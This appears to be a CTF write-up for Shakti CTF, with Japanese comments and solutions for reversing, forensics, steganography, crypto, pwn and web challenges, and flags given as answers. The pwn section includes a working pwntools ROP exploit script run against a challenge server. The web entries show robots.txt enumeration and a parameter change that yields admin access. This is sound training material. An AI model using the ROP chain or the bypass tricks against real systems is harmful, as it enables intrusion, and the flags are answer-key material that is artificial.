Reversing
Just-Run-It!
Do you know how to run a binary in linux?
実行するだけ
~/ctf/Shakti CTF ᐅ ./run Here's your flag! : shaktictf{and_that's_how_you_run_a_linux_binary!}
FLAG : shaktictf{and_that's_how_you_run_a_linux_binary!}
PYthn
Familiar with python?
Z=[] k=[] Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6" def Fun(inp): st=[] for i in range (len(inp)): st.append(chr(ord(inp[i])^1)) return(''.join(st)) def FuN(inp): for i in range(len(inp)): if(i<11): Z.append(chr(ord(inp[i])+i+5)) else: Z.append(chr(ord(inp[i])+4)) return(''.join(Z)) def fuN(text,s): result = "" for i in range(len(text)): char = text[i] if(char.isnumeric()): result+=(chr(ord(char)-1)) elif(char.isupper()): result += chr((ord(char) + s-65) % 26 + 65) else: result+=(chr(ord(char)^1)) return result X=input("Enter input:") k=FuN(Fun(X)) if(Q!=k): print("NO") else: print("Flag: shaktictf{"+X+"}")
solve.py
Z=[] Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6" def Fun(inp): st=[] for i in range (len(inp)): st.append(chr(ord(inp[i])^1)) return(''.join(st)) def FuN(inp): for i in range(len(inp)): if(i<11): Z.append(chr(ord(inp[i])-i-5)) else: Z.append(chr(ord(inp[i])-4)) return(''.join(Z)) print(Fun(FuN(Q)))
~/ctf/Shakti CTF/PYthn ᐅ python3 solve.py G00d!_c0nTinUe_Expl0r1nG_Mor3
FLAG : shaktictf{G00d!_c0nTinUe_Expl0r1nG_Mor3}
Damez
Oops! There was a sudden crash on Margret's system. She's afraid that she lost the passcode which she needs in urgency for running a simple prog which hopefully was backed up. Could you figure out the passcode and run the program successfully.
IDAで見たらフラグがあった
FLAG : shaktictf{K33p_th3_gam3_g0ing_gurl!}
Forensics
Shark on Wire
Lara sent me a file which had some hidden message. Help me recover the secret information.
Wiresharkで見る
FLAG : shaktictf{wir3sh4rk_i5_ju5t_aw3s0m3}
Not That Easy
We have intercepted the communication between two criminals and we found that they had shared a secret information. Can you find out the secret?
pngがある。rawで保存する。
FLAG : shaktictf{sh3_w4s_h0n0r3d_by_3lectr0nic_fr0nti3r_f0und4ti0n}
Steganography
Hidd3n
############################## ########## exiftool ########## ############################## ExifTool Version Number : 10.40 File Name : image.jpg Directory : . File Size : 44 kB File Modification Date/Time : 2020:12:04 18:21:00+00:00 File Access Date/Time : 2020:12:05 05:05:46+00:00 File Inode Change Date/Time : 2020:12:05 05:05:42+00:00 File Permissions : rw------- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 1 Y Resolution : 1 Comment : cGFzc3BocmFzZT1qdTV0ZmluZG0z Image Width : 800 Image Height : 600 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 800x600 Megapixels : 0.480
$ echo cGFzc3BocmFzZT1qdTV0ZmluZG0z | base64 -d passphrase=ju5tfindm3
root@3a8a801b9951:/data# steghide extract -sf image.jpg Enter passphrase: ju5tfindm3 wrote extracted data to "flag.txt".
"In engineering, the point is to get the job done, and people are happy to help. You should be generous with credit, and you should be happy to help others." Who am I? Here is your flag: shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
FLAG : shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
Cryptography
3,2,1..Go
Introducing our theme woman : "Joan Clarke!" Cipher : WEQEXFTUXQHVOUFPSVLPTORHAFBQE Looks like I found something I shouldn't have. Seperate the words by underscores('_ ') and submit everything in lowercase around the flag format
configを参考にエニグマ暗号を解く
FLAG : shaktictf{you_have_cracked_the_enigma_genius}
Easy Encoding
Joan knows this is breakable. Do you know how? 01001110 01111010 01001101 00110010 01001111 01000100 01011001 01111000 01001110 01101101 01001001 00110011 01001110 01000100 01011001 00110101 01001110 01101010 01001101 00110011 01001110 01000100 01011001 00110010 01001110 00110010 01001001 00110001 01001110 01111010 01001101 00110000 01001110 01111010 01001001 00110010 01011010 01000100 01010101 00110001 01001110 01111010 01000001 00110001 01011010 01101010 01010001 01111010 01001110 01101010 01100111 01111010 01001110 01000100 01011010 01101010 01001110 01101101 01001101 01111010 01001101 01111010 01011010 01101100 01001110 01101010 01100011 01111010 01001101 01111010 01100100 01101011
from bin, base64, hexの順でデコードする
FLAG : shaktictf{W4rmUp_Ch4ll3ng3}
Ancient Warfare
rot13
Do you know how people from Caeser's time used to send encrypted messages? Try to get the flag : funxgvpgs{byq3e_1f_a0g_nyj4lf_gu3_o3gg3e!}
FLAG : shaktictf{old3r_1s_n0t_alw4ys_th3_b3tt3r!}
SimpleRSA
Here's the secret message from Joan to you. Break it and Read it.
Here's a simple RSA challenge for you. n = 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761L e = 65537 c = 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
~/tools/RsaCtfTool (master ✘)✭ ᐅ python3 RsaCtfTool.py -n 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761 -e 65537 --uncipher 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483 [+] Clear text : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}'
FLAG : shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}
Pwn
Connect
Your adventure begins here to help the renowned Computer Scientist Kathleen Booth to get across the challenges and win the race. Cross the gates and enter into the arena!
繋ぐだけ
~/ctf/Shakti CTF ᐅ nc 34.72.218.129 1111 You have successfully connected to our service! To get your flag, please enter the appropriate bash commands. cat flag.txt shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
FLAG : shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
Adventure Chain
Kathleen is on her next adventure, which marked her name in history of Computer Science forever. Looks like the pieces of her ARC code seem to be brewing something notorious. Follow the chains which might lead you to a hideous place where you can claim your mastery and discover the unintended invention.
gdb-peda$ patto AA0AAFAAbA
AA0AAFAAbA found at offset: 40
ripのoffsetは40
flag関数ではif ( password == 0x1337 && admin_val == 0xCAFEBABE && a1 == 0xDEADC0DE && a2 == 0xDEAD10CC )を満たさなくてはいけない。 assert関数でpasswordを指定する。
__int64 __noreturn assert() { password = 0x1337; return 0LL; }
setValue関数でadmin_valを設定できる。 pop rdi; ret;で0xDEADBEEFを第一引数に指定する。
__int64 __fastcall setValue(int a1) { if ( password != 0x1337 || a1 != 0xDEADBEEF ) puts("Oops no :("); else admin_val = 0xCAFEBABE; return 0LL; }
あとはflag関数で第一引数0xDEADC0DE、第二引数0xDEAD10CCを満たすようにROPを組む
from pwn import * binary = "./chall" host ="34.72.218.129" port = 4444 elf = ELF(binary) context.binary = binary context.log_level = "info" commands = """ continue """ if len(sys.argv) >= 2 and sys.argv[1] == "r": # remote s = remote(host, port) elif len(sys.argv) >= 2 and sys.argv[1] == "d": # debug s = gdb.debug(binary, commands) # libc = elf.libc else: # local s = process(binary) # libc = elf.libc pop_rdi = next(elf.search(asm("pop rdi; ret"))) pop_rsi_r15 = next(elf.search(asm("pop rsi ; pop r15 ; ret"))) s.sendlineafter(">> ", "1") payload = b"A"*40 payload += p64(elf.sym["assert"]) payload += p64(pop_rdi) payload += p64(0xDEADBEEF) payload += p64(elf.sym["setValue"]) payload += p64(pop_rdi) payload += p64(0xDEADC0DE) payload += p64(pop_rsi_r15) payload += p64(0xDEAD10CC) payload += p64(0) payload += p64(elf.sym["flag"]) s.sendlineafter("Enter your name:\n", payload) sleep(1) s.interactive()
~/ctf/Shakti CTF/Adventure Chain ᐅ python3 exploit.py r [*] '/home/user/ctf/Shakti CTF/Adventure Chain/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to 34.72.218.129 on port 4444: Done [*] Switching to interactive mode Mischief managed... Here is your flag: shaktictf{r0pe_climbing_chaining_1337_way} [*] Got EOF while reading in interactiv
FLAG : shaktictf{r0pe_climbing_chaining_1337_way}
Web
Biscuits
Ada Lovelace used to love eating french biscuits during her work
クッキーにフラグがある
URLデコードする
FLAG : shaktictf{c00k13s_m4k3_phr3n0l0gy&m3sm3r15m_3asy}
Machine
Babbage was impressed by Lovelace's intellect and analytic skills that he called her a humanoid
robots.txtを見る
~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/robots.txt User-agent: * Allow: /var/www/html/ Disallow: /mkiujnbhytgbvfr.html ~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/mkiujnbhytgbvfr.html shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
FLAG : shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
Ador
Ada was born on 10 December 1815 not 12, identification change makes a difference
adminならsecretが見れるらしい
ソースを確認するとuserパラメータがあるらしい
~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://104.198.67.251/Ador/\?name\=admin Welcome Admin, here is the secret shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
FLAG : shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
AuthEN
Ada is important to the world, she is important for a reason
ソースにパスワードがある
<script> $(“.c_submit”).click(function(event) { event.preventDefault() var email = $(“#cuser”).val(); var password = $(“#cpass”).val(); if(username == “admin” && password == String.fromCharCode(115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125)) { if(document.location.href.indexOf(“?password=”) == -1) { document.location = document.location.href + “?password=” + password; } } else { $(“#cresponse”).html(“<div class=’alert alert-danger’>Wrong password sorry.</div>”); } }) </script>
s = [115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125] flag = "" for c in s: flag += chr(c) print(flag)
~/ctf/Shakti CTF ᐅ python3 solve.py shaktictf{b3y0nd_pur3_c4lculati0ns}
FLAG : shaktictf{b3y0nd_pur3_c4lculati0ns}